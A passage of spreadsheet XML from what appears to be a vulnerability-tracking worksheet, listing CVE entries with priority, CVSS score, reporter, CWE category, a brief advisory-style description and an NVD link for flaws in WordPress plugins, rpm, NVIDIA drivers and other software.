      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.4 versions.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102391</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102395</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Easy Google Maps &lt;= 1.14.6 versions.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102395</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102396</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Ultimate Maps by Supsystic &lt;= 1.5.5 versions.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102396</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102398</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Popup by Supsystic &lt;= 1.13.1 versions.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102398</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102456</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has an SQL Injection vulnerability. Authenticated remote attackers can inject arbitrary SQL commands to read database contents.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102456</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102457</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has an Arbitrary File Read vulnerability. Authenticated remote attackers can exploit this vulnerability to download arbitrary system files.</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102457</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103242</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow flaw was found in rpm. RPMTAG_FILESIGNATURES in a crafted, unsigned RPM package's main header is declared with the wrong header type, causing hex2binv() to allocate a one-byte buffer and then write the tag's attacker-controlled, hex-decoded content — of attacker-chosen length — past the end of that allocation. This is reachable via rpm2cpio, rpm2archive, and rpm -qlvp on an untrusted package.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103242</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27371</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPFunnels &lt;= 3.13.1 versions.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27371</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47554</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where improper verification of cryptographic signatures may cause signature verification to be bypassed under memory pressure. A successful exploit of this vulnerability might lead to denial of service and data tampering.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47554</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47602</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode driver where a local user can cause the driver to dereference an untrusted pointer. A successful exploit of this vulnerability might lead to denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47602</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78210</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>security@octopus.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>In affected versions of Octopus Server, users with certain scoped permission sets could execute arbitrary scripts in an environment without possessing the required authorization.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78210</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92869</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write vulnerability exists in Pgpool-II, which may allow an authenticated attacker to cause abnormal process termination.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92869</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93512</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JW Player for WordPress &lt;= 2.3.11 versions.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93512</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93514</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Notification for Telegram &lt;= 3.5.2 versions.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93514</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93770</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WP Statistics &lt;= 14.16.13 versions.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93770</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94078</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Site Reviews &lt;= 8.3.1 versions.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94078</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94081</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WordPress Persistent Login &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94081</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94171</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in CURCY &lt;= 2.2.16 versions.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94171</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94499</t>
        </is>
      </c>
